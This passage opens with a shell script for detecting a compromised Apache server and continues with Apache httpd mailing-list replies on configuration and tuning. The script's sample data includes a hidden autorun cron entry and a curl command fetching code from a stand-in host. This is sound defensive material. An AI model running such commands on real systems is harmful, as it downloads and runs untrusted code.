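# Processes owned by the web server account that are not the httpd binary.
# $1 = saved `ps -eo user,pid,args` output, $2 = account, $3 = httpd path
# Compares the command name only; it does not verify the binary on disk.
odd_children() {
    awk -v u="$2" -v bin="$3" 'NR > 1 && $1 == u && $3 != bin' "$1"
}

# Which of noexec,nosuid,nodev are missing on a mount point.
# $1 = file in /proc/mounts format, $2 = mount point
missing_mount_opts() {
    opts=$(awk -v mp="$2" '$2 == mp { o = $4 } END { print o }' "$1")
    if [ -z "$opts" ]; then
        echo "not-a-separate-mount"
        return 0
    fi
    missing=""
    for want in noexec nosuid nodev; do
        case ",$opts," in
            *",$want,"*) ;;
            *) missing="$missing $want" ;;
        esac
    done
    echo "${missing# }"
}

# Write constructed sample inputs into directory $1.
make_samples() {
    cat > "$1/cron" <<'EOF'
# constructed sample crontab for user apache
* * * * * /var/tmp/.autorun/update >/dev/null 2>&1
0 3 * * * /usr/bin/php /var/www/site/cron.php
EOF
    cat > "$1/error_log" <<'EOF'
[Wed Jan 11 16:02:11 2012] [error] [client 192.0.2.10] File does not exist: /var/www/html/favicon.ico
sh: del: command not found
sh: ./xx: Permission denied
EOF
    cat > "$1/ps" <<'EOF'
USER       PID COMMAND
root      1201 /usr/local/apache/bin/httpd -k start
apache    1250 /usr/local/apache/bin/httpd -k start
apache    2162 sh -c curl -O http://example.invalid/placeholder
EOF
    cat > "$1/mounts" <<'EOF'
/dev/sda1 / ext3 rw 0 0
/dev/sda3 /tmp ext3 rw,nosuid 0 0
/dev/sda5 /var/tmp ext3 rw,noexec,nosuid,nodev 0 0
EOF
}

demo() {
    d=$(mktemp -d) || return 1
    make_samples "$d"
    echo "cron entries under world-writable dirs:"
    suspicious_cron_lines "$d/cron"
    echo "shell diagnostics in error_log: $(shell_noise_count "$d/error_log")"
    echo "non-httpd processes owned by apache:"
    odd_children "$d/ps" apache /usr/local/apache/bin/httpd
    echo "/tmp is missing: $(missing_mount_opts "$d/mounts" /tmp)"
    rm -rf "$d"
}
demo
```

On a live host the inputs would be the apache user's crontab file, the error_log, saved `ps -eo user,pid,args` output and /proc/mounts.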



Re: [users@httpd] attack on apache

2012-01-11 Thread Jeroen Geilman

On 01/11/2012 10:10 PM, Jaco Kroon wrote:

On 11/01/12 22:37, Luisa Ester Navarro wrote:




J.
Thanks Jeroen:
 any idea how to start researching which is the leaky script
Cheers
Luisa

Hehe, this is where they say, RTFS, or as Jeroen suggested, see if you 
can correlate something in the logs.  If apache is still running and 
you happen to have mod_info, it's useful as it at least gives you the 
paths being processed, often the "child script" will hold up the 
processing and you can then spot the script in use in the mod_info 
data, in other cases, it's a wild goose chase.


I think you are referring to the server-status handler provided by 
mod_status, which shows the URIs currently being served if you set the 
global option ExtendedStatus to On.


--
J.



Re: [users@httpd] mod_rewrite access control configuration

2012-01-14 Thread Jeroen Geilman

On 01/14/2012 09:35 AM, Asplund Marko wrote:

Hi,

I'm using Apache httpd to act as a reverse proxy and I'd like to block
access to all but explicitly listed resources.
I've come up with two possible solutions that i'd like to check with more
experienced mod_rewrite users.

Is there any difference between the two approaches below from performance
or other points of view?
I expect the set of allowed resources to be probably below 30.
I'm also planning on employing other Apache modules in the proxy such as
mod_cache and possibly mod_security.

# method A: one rule with several conditions.
# allow access to resources starting with /foo/, /bar/ or /baz/; block others
RewriteCond %{REQUEST_URI} ^/foo/ [OR]
RewriteCond %{REQUEST_URI} ^/bar/ [OR]
RewriteCond %{REQUEST_URI} ^/baz/
RewriteRule  ^ - [P]

RewriteRule ^ - [F]

# method B, multiple rules without conditions

# allow access to resources starting with /foo/, /bar/ or /baz/; block others
RewriteRule ^/foo/ - [P]
RewriteRule ^/bar/ - [P]
RewriteRule ^/baz/ - [P]
RewriteRule ^ - [F]


All requests are currently proxied to the backend server simply using:


ProxyPass / ajp://127.0.0.1:8009/




Rewrite and Proxypass are not related.
Why exactly are you using RewriteRules for this ?

--
J.





Re: [users@httpd] MaxClients 256 but server-status show 1024 slots

2012-01-15 Thread Jeroen Geilman

On 01/15/2012 07:31 PM, Helmut Schneider wrote:

Hi,

u1dd_hr@desoggw04:~$ sudo grep -ir MaxClients /etc/apache2/
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/apache2.conf:MaxClients  150
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/Includes/server.conf.local:MaxClients 256
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of server
processes allowed to start
/etc/apache2/apache2.conf.org:MaxClients  150
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of
simultaneous client connections
/etc/apache2/apache2.conf.org:MaxClients  150
/etc/apache2/apache2.conf.org:# MaxClients: maximum number of
simultaneous client connections
/etc/apache2/apache2.conf.org:MaxClients  150
u1dd_hr@desoggw04:~$

So the highest value configured is 256 (setting at server.conf.local
overwrite defaults at apache2.conf). But /server-status shows:

___KWKC__KWK_...
_W_K__K_KKKWKKK_K...
__KKK_K___W__...














That's 1024 slots. And yes, I stopped and restarted apache and even the
server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Thanks and Regards, Helmut

Are you using worker or prefork ? What is serverlimit set to ?


--
J.





Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

2012-01-15 Thread Jeroen Geilman

On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at server.conf.local
overwrite defaults at apache2.conf). But /server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache and even
the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I need to
adjust either ThreadsPerChild or ServerLimit (or both)?! What is
recommended? Both are currently unset/defaults.




What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.


--
J.





Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

2012-01-15 Thread Jeroen Geilman

On 01/15/2012 08:13 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at
server.conf.local overwrite defaults at apache2.conf). But
/server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache and
even the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I need
to adjust either ThreadsPerChild or ServerLimit (or both)?! What is
recommended? Both are currently unset/defaults.

What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.

Check apache with nagios. I have a plugin that checks available slots
and when "MaxClients != open slots" Nagios thinks that everything is
fine while apache does not serve new clients anymore.


That would be a nagios bug, then.


--
J.





Re: [users@httpd] Re: MaxClients 256 but server-status show 1024 slots

2012-01-15 Thread Jeroen Geilman

On 01/15/2012 10:45 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:13 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 08:01 PM, Helmut Schneider wrote:

Jeroen Geilman wrote:


On 01/15/2012 07:31 PM, Helmut Schneider wrote:

[...]

So the highest value configured is 256 (setting at
server.conf.local overwrite defaults at apache2.conf). But
/server-status shows:

[...]

That's 1024 slots. And yes, I stopped and restarted apache
and even the server itself.

What's wrong here?

~$ apache2 -v
Server version: Apache/2.2.14 (Ubuntu)
Server built:   Nov  3 2011 03:30:19
~$

Are you using worker or prefork ? What is serverlimit set to ?

Ah, I see. It is configured to use worker. Am I correct that I
need to adjust either ThreadsPerChild or ServerLimit (or
both)?! What is recommended? Both are currently unset/defaults.

What is it you want to do ?
Worker threads consume very little memory, the defaults are fine.

Check apache with nagios. I have a plugin that checks available
slots and when "MaxClients != open slots" Nagios thinks that
everything is fine while apache does not serve new clients anymore.

That would be a nagios bug, then.

No, it has nothing to do with nagios. The plugin just checks how many
slots are available counting the dots from /server-status while afaiu
MaxClients possibly limits them to a smaller value.



Exactly. So the check is incorrect.

--
J.
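
The disagreement above is about what to count. As an added example (not the plugin from the thread, and not code from any poster), this check reads the machine-readable /server-status?auto output and measures headroom against the configured MaxClients instead of counting open '.' slots in the scoreboard; the function names, thresholds and the sample status output are constructed.

```shell
#!/bin/sh
# Added example: worker headroom check against MaxClients.
# Input is saved output of /server-status?auto (mod_status).
# Function names, thresholds and the sample data are constructed.

# Value of one "Name: value" field. $1 = file, $2 = field name
status_field() {
    awk -F': ' -v k="$2" '$1 == k { print $2 }' "$1"
}

# What a dot-counting check sees: scoreboard slots with no process.
scoreboard_open_slots() {
    status_field "$1" Scoreboard | tr -cd '.' | wc -c | tr -d ' '
}

# Workers that can still take a request before MaxClients is reached.
# $1 = file, $2 = configured MaxClients
worker_headroom() {
    busy=$(status_field "$1" BusyWorkers)
    echo $(( $2 - $busy ))
}

# Nagios-style result: prints a status line, returns 0 (OK), 1 (WARNING)
# or 2 (CRITICAL). $1 = file, $2 = MaxClients, $3 = warn, $4 = crit
check_workers() {
    free=$(worker_headroom "$1" "$2")
    if [ "$free" -le "$4" ]; then
        echo "CRITICAL - $free of $2 workers free"
        return 2
    elif [ "$free" -le "$3" ]; then
        echo "WARNING - $free of $2 workers free"
        return 1
    fi
    echo "OK - $free of $2 workers free"
    return 0
}

# Constructed sample: 1024 scoreboard slots, 250 busy, 6 idle, 768 open.
make_sample() {
    {
        echo "Total Accesses: 48211"
        echo "BusyWorkers: 250"
        echo "IdleWorkers: 6"
        printf 'Scoreboard: '
        awk 'BEGIN { for (i = 0; i < 250; i++) printf "W"
                     for (i = 0; i < 6; i++) printf "_"
                     for (i = 0; i < 768; i++) printf "."
                     print "" }'
    } > "$1"
}

demo() {
    f=$(mktemp) || return 1
    make_sample "$f"
    echo "open scoreboard slots: $(scoreboard_open_slots "$f")"
    echo "headroom with MaxClients 256: $(worker_headroom "$f" 256)"
    check_workers "$f" 256 25 10 || echo "(exit code $?)"
    rm -f "$f"
}
demo
```

With the sample data the scoreboard still shows 768 open slots while only 6 workers remain under MaxClients 256, which is the situation described in the thread.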





Re: [users@httpd] Apache 2.4.1 Installation problems

2012-04-17 Thread Jeroen Geilman

On 2012-04-17 17:48, John Iliffe wrote:

I am trying to update from 2.2.14 to 2.4.1 and have encountered two
problems.  2.2.14 has been working properly for over 2 years.  Pages are
located on a separate directory starting at /www with subdirectories s1,
s2, etc for different named virtual hosts.  Config file for EACH virtual host
shows document root as /www/s1, /www/s2, etc as relevant.

1.  Apache will start properly but gives a "Not Authorized" message when
any page is to be served.

Log:

[Mon Apr 16 13:02:31.267819 2012] [authz_core:error] [pid 23033:tid
1100290368] [client 192.168.1.1:41839] AH01630: client denied by server
configuration: /www/s2/, referer: http://www.x.ca/url0001.html
[Mon Apr 16 13:02:38.965404 2012] [authz_core:error] [pid 23033:tid
1110780224] [client 192.168.1.1:41842] AH01630: client denied by server
configuration: /www/s1/, referer: http://www.xx.ca/url0001.html

A search of the Apache archives suggests that this is a config problem
requiring a <Directory> entry so I set up:

# Allow the directory where we store the pages -- 2012-04-15

   Options FollowSymLinks
   Order Allow,Deny
   Allow from all



AAA configuration has changed completely in 2.4; this is well-documented 
in the manual.
Instead of Allow from all, use "Require all granted"; the Order 
directive is no longer required.


Refer to http://httpd.apache.org/docs/2.4/howto/auth.html for details.


I tried a number of variations such as putting this in each of the virtual
host containers, putting a /* on the end, including it once before all the
virtual host declarations, etc.


The latter is the correct form if you want to grant access to all 
content by default.



Still get same problem.
--

Second problem:

Many of the pages are written in PHP and I have PHP installed on the server
and used by 2.2.14.  I copied the module libphp5.so into the modules
directory and added a LoadModule directive as follows:

  LoadModule php5_module modules/libphp5.so

(This line has to be commented out to start Apache)

When I try to start up Apache I get the following error:

/usr/apache-2.4.1/bin/apachectl -k start
httpd: Syntax error on line 153 of /usr/apache-2.4.1/conf/httpd.conf:
Cannot load /usr/apache-2.4.1/modules/libphp5.so into server:
/usr/apache-2.4.1/modules/libphp5.so: undefined symbol: unixd_config

What causes this and what is the solution?


Modules are built for a specific apache portable runtime (APR) version; 
you cannot load an old module into a newer APR release.

This is directly linked to the apxs version used to build the module.
You need to either obtain an updated module from your package 
repository, or compile the module from source for your apache version.



--
J.





Re: [users@httpd] Apache 2.4.1 Installation problems

2012-04-17 Thread Jeroen Geilman

On 2012-04-17 18:02, Mathijs Schmittmann wrote:

A. Your mail becomes unreadable

Q. What happens when you top-post ?

Also, try to avoid that Reply-to-all button...


1: 2.4 uses different auth methods and directives, see 
http://httpd.apache.org/docs/2.4/upgrading.html and check out the 
authentication section. You probably either need the compat module, or a new 
access control directive is overriding your current directory section.

2: Apache 2.4 needs modules that are compiled with the new apr, so make sure to 
recompile your mod_php as well.

On 17 Apr 2012, at 17:48, John Iliffe wrote:


I am trying to update from 2.2.14 to 2.4.1 and have encountered two
problems.  2.2.14 has been working properly for over 2 years.  Pages are
located on a separate directory starting at /www with subdirectories s1,
s2, etc for different named virtual hosts.  Config file for EACH virtual host
shows document root as /www/s1, /www/s2, etc as relevant.

1.  Apache will start properly but gives a "Not Authorized" message when
any page is to be served.

Log:

[Mon Apr 16 13:02:31.267819 2012] [authz_core:error] [pid 23033:tid
1100290368] [client 192.168.1.1:41839] AH01630: client denied by server
configuration: /www/s2/, referer: http://www.x.ca/url0001.html
[Mon Apr 16 13:02:38.965404 2012] [authz_core:error] [pid 23033:tid
1110780224] [client 192.168.1.1:41842] AH01630: client denied by server
configuration: /www/s1/, referer: http://www.xx.ca/url0001.html

A search of the Apache archives suggests that this is a config problem
requiring a <Directory> entry so I set up:

# Allow the directory where we store the pages -- 2012-04-15

  Options FollowSymLinks
  Order Allow,Deny
  Allow from all


I tried a number of variations such as putting this in each of the virtual
host containers, putting a /* on the end, including it once before all the
virtual host declarations, etc.

Still get same problem.
--

Second problem:

Many of the pages are written in PHP and I have PHP installed on the server
and used by 2.2.14.  I copied the module libphp5.so into the modules
directory and added a LoadModule directive as follows:

LoadModule php5_module modules/libphp5.so

(This line has to be commented out to start Apache)

When I try to start up Apache I get the following error:

/usr/apache-2.4.1/bin/apachectl -k start
httpd: Syntax error on line 153 of /usr/apache-2.4.1/conf/httpd.conf:
Cannot load /usr/apache-2.4.1/modules/libphp5.so into server:
/usr/apache-2.4.1/modules/libphp5.so: undefined symbol: unixd_config

What causes this and what is the solution?

Thanks.

John




Re: [users@httpd] Response code 408

2012-05-15 Thread Jeroen Geilman

On 05/11/2012 06:01 PM, John Iliffe wrote:

I recently switched from Apache-2.2.14 to Apache-2.4.2.  In the entire time
we ran 2.2.14 I don't recall seeing a response code 408.  Since we switched
two weeks ago we average about 30 - 35 a day.  Our server is not heavily
loaded.

The RFC definition of response code 408 is "Request Timeout, the client did
not produce a request within the time the server was prepared to wait."

All of these 408's are arising from background (AJAX) requests in the
browser that are well known to be very short  (16 bytes of data coded as an
HTTP GET).

Which parameter have I set too short?  Looking at the Apache docs there
don't seem to be any obvious choices.


As clearly documented, one of the many new modules in 2.4 is 
mod_reqtimeout, which controls exactly this.


http://httpd.apache.org/docs/2.4/mod/mod_reqtimeout.html

It allows the server administrator to determine on a per-vhost basis how 
long the request timeout should be, and what the minimum data rate 
should be.

This was added specifically to combat bots and slowdos attempts.

The defaults - which you did not adjust for your site - are obviously 
not suited for your small AJAX snippets.


Blind upgrades never go well.

--
J.



Re: [users@httpd] 403 Forbidden ...

2012-11-13 Thread Jeroen Geilman

On 11/13/2012 09:34 PM, Lester Caine wrote:

Lester Caine wrote:

Found a few little niggles while sorting mod_info. I was still running 
mod_access_compat and switching that off flagged a couple of problems. 
All have now been cleared but no change to the 403 error on rewrite 
results.


mod_info is now loaded, but currently I'm just flipping to home page just 
working through the settings.

Now working but locked down locally at present ...
What should I be looking for.


Just working through Yehuda's link as well.
I've tried a few things from the mediawiki article but I suspect that 
is based on 2.2 working?


AH - found something!
I've switched the deny off on the '/' level

From server-info -
Current Configuration:
In file: /opt/apache2/conf/httpd.conf
 199: 
 201:   Require all granted ( Was denied )
: 
 223: 
 224:   Require all denied
: 
 315: 
 318:   Require all granted
: 
In file: /opt/apache2/conf/vhosts.d/25_vhost.eveshamtc.org.uk.conf
  60:   
  73: Options FollowSymLinks
  80: AllowOverride All
:   
  94:   ErrorDocument 404 /index.php
: 

AND THEN I GET
Warning: require_once(../kernel/setup_inc.php): failed to open stream: 
No such file or directory in /wiki/index.php on line 16 Fatal error: 
require_once(): Failed opening required '../kernel/setup_inc.php' 
(include_path='.:/opt/php5/lib/php:/opt/php5/lib/php/PEAR') in 
/wiki/index.php on line 16


Which is telling me that the rewrite has lost the local directory 
details for the vhost ... Or at least I think that is the problem?




No, PHP include errors have typically no cause in apache misconfiguration.


--
J.





Re: [us...@httpd] Re: LimitRequestBody http return code

2010-11-15 Thread Jeroen Geilman

On 11/15/2010 10:12 PM, Mohit Anchlia wrote:

On Sun, Nov 14, 2010 at 11:58 AM, Jonas Eckerman  wrote:
   

On 2010-11-04 23:38, Mohit Anchlia wrote:

 

500 (Internal Server Error) Can't read entity body: Connection reset by peer
Content-Type: text/plain
Client-Date: Thu, 04 Nov 2010 22:36:21 GMT
Client-Warning: Internal response
   

If this is in something done with perl LWP, the "Client-Warning:
Internal response" header indicates that the error is generated by the
perl or XS HTTP code and not by the server.



 

But even access logs don't show http 403:

10.4.106.55 - - [04/Nov/2010:15:39:36 -0700] "POST /val/validate.cgi
HTTP/1.1" 400 364 "-" "libwww-perl/5.79" "eitws1" 0 - - - 188 522

   


No, it says 400 - bad request.
Check the logs of your CGI for what went wrong.



--
J.





Re: [us...@httpd] Re: LimitRequestBody http return code

2010-11-15 Thread Jeroen Geilman

On 11/15/2010 10:21 PM, Mohit Anchlia wrote:

On Mon, Nov 15, 2010 at 1:18 PM, Jeroen Geilman  wrote:
   

On 11/15/2010 10:12 PM, Mohit Anchlia wrote:
 

On Sun, Nov 14, 2010 at 11:58 AM, Jonas Eckerman
  wrote:

   

On 2010-11-04 23:38, Mohit Anchlia wrote:


 

500 (Internal Server Error) Can't read entity body: Connection reset by
peer
Content-Type: text/plain
Client-Date: Thu, 04 Nov 2010 22:36:21 GMT
Client-Warning: Internal response

   

If this is in something done with perl LWP, the "Client-Warning:
Internal response" header indicates that the error is generated by the
perl or XS HTTP code and not by the server.


<http://search.cpan.org/~gaas/libwww-perl-5.837/lib/LWP/UserAgent.pm#REQUEST_METHODS>


 

But even access logs don't show http 403:

10.4.106.55 - - [04/Nov/2010:15:39:36 -0700] "POST /val/validate.cgi
HTTP/1.1" 400 364 "-" "libwww-perl/5.79" "eitws1" 0 - - - 188 522


   

No, it says 400 - bad request.
Check the logs of your CGI for what went wrong.
 

Nothing is wrong in the request. If I just remove LimitRequestBody and
send the same request it works.
   


I am not claiming it is a bad request. Apache tells you it is.

--
J.





Re: [us...@httpd] last access time

2010-11-17 Thread Jeroen Geilman

On 11/17/2010 09:21 PM, Peter Janovsky wrote:
does apache modify the last access date of a resource obtained through 
a call to function ap_sub_req_lookup_file?




That would be dependent on your filesystem, not apache.
If you mount the filesystem with noatime, it will not be changed.


--
J.



Re: [us...@httpd] httpd choking (503 errors) when stressing mod_proxy

2010-11-17 Thread Jeroen Geilman

On 11/17/2010 08:18 PM, Ahmed Bakir wrote:

Hi all,

For the application I am working on right now, I need to send large 
files between two servers via Apache. I am using reverse proxying to 
accomplish this. When I hammer my host with requests from the client 
(several requests in short succession), error.log starts to fill up 
with "OS Error 10055" messages.


OS error 10055 = No buffer space available.
You need to increase your TCP receive buffers, because apache cannot 
properly buffer the data between the client and the backend, and has to 
tell the client it cannot serve the request (which is a 503).


Is there a significant bandwidth difference between the connections ?



I notice this problem on httpd 2.2.17; I do not see it on httpd 
2.0.64. Other than the standard conversion of some module names (ex, 
mod_access) for compatibility with 2.0.64, my httpd.conf did not change.


However, the behaviour of settings may have changed.

We're going to need a lot more detailed information, such as: MPM used , 
MPM settings, maxclients, maxrequestsperchild, keepalive and timeout 
settings, proxypass options set, etc.




--
J.





Re: [us...@httpd] HTTP PROCESS CONSUMING 100% cpu

2010-11-17 Thread Jeroen Geilman

On 11/17/2010 09:39 PM, Ravi Markil wrote:

Hi friends

I recently installed xampp 1.7.1 application which has apache server.
Starting the apache is consuming 100% of CPU starting from 20%, which is 
affecting the performance of my system.

Please help me out.

Last few lines from access.log

127.0.0.1 - - [17/Nov/2010:12:28:40 -0800] "POST /jobs/check HTTP/1.1" 200 4502


Looks like something on that machine is POSTing 4KB to your apache 
server every 10 seconds, and apache is set up to accept it.

Perhaps you need to investigate what that something is.
Since apache is accepting the POST, it follows that you would have an 
idea what that process is - you would have had to configure apache for 
this to work, it will not do this out of the box.


127.0.0.1 - - [17/Nov/2010:12:28:50 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:00 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:10 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:20 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:30 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:40 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:29:50 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:30:00 -0800] "POST /jobs/check HTTP/1.1" 200 4502
127.0.0.1 - - [17/Nov/2010:12:30:10 -0800] "POST /jobs/check HTTP/1.1" 200 4502


thanks
Ravi.



--
J.





Re: [us...@httpd] httpd choking (503 errors) when stressing mod_proxy

2010-11-17 Thread Jeroen Geilman

On 11/17/2010 10:23 PM, Ahmed Bakir wrote:

Thanks for the responses!

@jeroen:

- There is no bandwidth difference between the connections. Both the 
client and the host are either running on the same machine or on the 
same LAN (I have tested on both and see the problem in both cases)
- I have increased TCP receiver buffers, and that has alleviated the 
problem but it's not a feasible solution for my application.


Because ?

- I am running httpd on Windows (I have tried both Windows 7 and 
Windows XP)


Ugh.
Fugly TCP stack.


- These are my MPM details:

Timeout 300
MaxKeepAliveRequests 100
KeepAliveTimeout 15



For a reverse proxy with heavy load, DISABLE keepalives. COMPLETELY.
They don't serve any useful purpose, and may in fact slow things down.

You won't observe the issues when testing from one client, because that 
one client will re-use its connections.


However, this does not work in the real world - proxy connections are 
fire-and-forget as far as the server is concerned.


Keepalive under heavy load contributes to what you are seeing - service 
unavailable.




ThreadsPerChild 250
MaxRequestsPerChild  0


- I have configured my reverse proxy using rewrite rules with the [P] 
directive


This is an example:

RewriteRule ^files/(.*)$ http://localhost:16/$1  [P]


Yeah... that means you can't regulate the proxy pool size and other 
settings.
I'd reconsider using rewriterules when you don't really know why you're 
using them.

A proper FilesMatch or Proxy block will do just fine:


ProxyPass http://localhost:16/ min=100 max=250 smax=100 acquire=1000ms


For example; I am by no means an expert on proxy configuration, but 
this  I could infer from the documentation in a few minutes.


You need to match the number of backend threads to your expected or - 
better - observed connections.



- I did not set any ProxyPass options in my config.


Perhaps you should!

--
J.






Re: [us...@httpd] Apache Proxy Directives

2010-11-20 Thread Jeroen Geilman

On 11/20/2010 11:21 PM, Sachin Bhugra wrote:

hi,

 I have compiled Apache 2.2.16 as follow:

./configure --prefix=/usr/local/httpd2.2.16 --with-mpm=prefork 
--with-mpm=worker --with-included-apr --enable-ssl --enable-proxy 
--enable-mods-shared="most proxy"




You can only build one MPM.

However, all I can see is the modules loaded for proxy, however none 
of the derivatives like ProxyRequests have been added to the conf files.


I think you mean "Directives".



There is also no proxy.conf file.


Apache has one configuration file, httpd.conf.



I was just wondering if these directives do get added or if there is 
sample file created after installing Apache2? 


The ample documentation explains all about the directives:

http://httpd.apache.org/docs/2.2/mod/mod_proxy.html



--
J.



Re: [users@httpd] Apache Startup Problems with mod_wsgi : Missing Symbols ap_cleanup_scoreboard and ap_accept_lock_mech

2010-11-21 Thread Jeroen Geilman

On 11/21/2010 09:22 PM, Anurag Chourasia wrote:

All,

I hope you could help me with a mod_wsgi load error upon startup of 
apache. This is affecting one of our site Go Live and I would 
appreciate any help offered in this regard.


The error upon startup of Apache is as follows

root [zibal]% ./usr/local/apache2/bin/apachectl restart
httpd: Syntax error on line 53 of /usr/local/apache2/conf/httpd.conf:
Cannot load /usr/local/apache2/modules/mod_wsgi.so into server:
rtld:0712-001 Symbol ap_cleanup_scoreboard was referenced from module 
/usr/local/apache2/modules/mod_wsgi.so(), but a runtime definition of 
the symbol was not found.
rtld: 0712-001 Symbol ap_accept_lock_mech was referenced from module 
/usr/local/apache2/modules/mod_wsgi.so(), but a runtime definition of 
the symbol was not found.




Apxs

I built Apache 2.2.17 and Mod_Wsgi 3.3 using the source and the 
compiler was gcc-4.2.


But not with apxs.
You MUST build apache modules with apxs.

--
J.





Re: [users@httpd] Server affinity instead of session affinity

2010-11-22 Thread Jeroen Geilman

On 11/22/2010 09:59 PM, Andrew Hole wrote:

Hi guys!
Is there any available configuration to define server affinity instead 
of session affinity? Our architecture setup is based on multiple JVMs 
(tomcat) instances in each server (machine). The goal is to send all 
requests (within a session) from a client browser to the same machine.


Still sounds like session affinity to me.


Is it possible to perform it using jvmRoute?


Perhaps ask in a tomcat-related forum.


Thanks a lot



--
J.





Re: [users@httpd] interpreting Nessus scan results | TRACE & TRACK?

2010-11-22 Thread Jeroen Geilman

On 11/22/2010 10:54 PM, egc wrote:

Greetings --

Running 2.2.17 on a CentOS 5.5 host. All the usual security tweaks 
(or, at least the ones I'm familiar with) in place. Had our network 
types run a Nessus scan against the host - all fine, except for the 
following, which I'm having trouble interpreting (and hoping for some 
'interpretative guidance' here). It suggests using a rewrite to handle 
the issue (something I've never done). I'm also not entirely sure of 
what TRACE and TRACK do?




The nessus text tells you exactly what they are for, and how to disable 
them.



--
J.





Re: [users@httpd] ProxyPass and remote ip-addresses

2010-11-27 Thread Jeroen Geilman

On 11/28/2010 12:50 AM, Lars Nielsen wrote:

Hi there,

I have a setup with 2 servers where the first one works as a proxy to
the second.
On my proxy server I have this in apache's config:


 ServerName www.hjemmesideteknik.dk
 ServerAlias hjemmesideteknik.dk
 ProxyPreserveHost On
 ProxyPass / http://192.168.1.106/
 ProxyPassReverse / http://192.168.1.106/


and the proxy works fine and I can see the site from the internet. My
problem is that in the access log file for the site it puts my proxy's
IP-address in as the remote IP instead of the original user's IP.

How can I solve this so the user's IP is written in the logfile?
   


Read the documentation for LogFormat:

http://httpd.apache.org/docs/current/mod/mod_log_config.html#logformat

It shows you how to log any variable apache knows about.


--
J.
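
An added example, not part of the original reply: on the backend, the request header to log is X-Forwarded-For, which mod_proxy sets on the proxy; a client can send that header too and the proxy appends to whatever is already there, so only the rightmost entry comes from your own proxy. The Python sketch below picks the address to trust; the proxy address 192.168.1.105 and all sample values are constructed.

```python
import ipaddress

# Assumption: the reverse proxy's own address. The thread only gives the
# backend (192.168.1.106), so this value is constructed for the example.
TRUSTED_PROXIES = (ipaddress.ip_network("192.168.1.105/32"),)


def is_trusted(addr, trusted=TRUSTED_PROXIES):
    """True if addr (an ipaddress object) is one of our own proxies."""
    return any(addr in net for net in trusted)


def client_ip(peer, xff_header, trusted=TRUSTED_PROXIES):
    """Return the address worth logging for one request.

    peer       -- TCP peer address seen by the backend (what %h logs)
    xff_header -- raw X-Forwarded-For value, or None if the header is absent
    """
    peer_addr = ipaddress.ip_address(peer)
    # A request that did not arrive through our proxy cannot vouch for any
    # header content, so the peer address is the only fact we have.
    if not is_trusted(peer_addr, trusted) or not xff_header:
        return str(peer_addr)

    # Each proxy appends the address it received the request from, so the
    # rightmost entries are the ones our own infrastructure wrote. Walk
    # right to left and stop at the first address that is not our proxy.
    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    for hop in reversed(hops):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            # Unparseable entry: fall back to the peer rather than log junk.
            return str(peer_addr)
        if not is_trusted(addr, trusted):
            return str(addr)
    return str(peer_addr)


# Constructed requests: (peer address, X-Forwarded-For header as received).
SAMPLE_REQUESTS = [
    ("192.168.1.105", "203.0.113.7"),             # normal proxied request
    ("192.168.1.105", "10.0.0.1, 203.0.113.7"),   # client pre-filled the header
    ("198.51.100.9", "203.0.113.7"),              # reached the backend directly
    ("192.168.1.105", None),                      # proxy's own health check
]

if __name__ == "__main__":
    for peer, xff in SAMPLE_REQUESTS:
        print(f"peer={peer:<15} xff={xff!s:<24} -> log {client_ip(peer, xff)}")
```
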





Re: [users@httpd] Connection Issues

2010-11-30 Thread Jeroen Geilman

On 11/29/2010 11:25 PM, Travis Whitton wrote:

Hi,

We're experiencing some odd behavior regarding connections taking a
long time to establish to our website. We've been running Apache in
production for over three years now and have recently begun
experiencing issues where the server-status page, static, and dynamic
content response times will slow anywhere from a few seconds to long
enough for the connection to timeout.

Initially thinking we might be hitting some hard limits with the OS,
we've thoroughly audited our sysctl variables, tried disabling
iptables and conntrack, and ensured that we're not running out of
ephemeral ports or anything along those lines. Looking at netstat, it
seems we have a pretty large number of connections in TIME_WAIT which
is understandable since this is a high traffic website, but I'm
wondering if this value could indicate we're backlogging on TCP
connections or something along those lines?

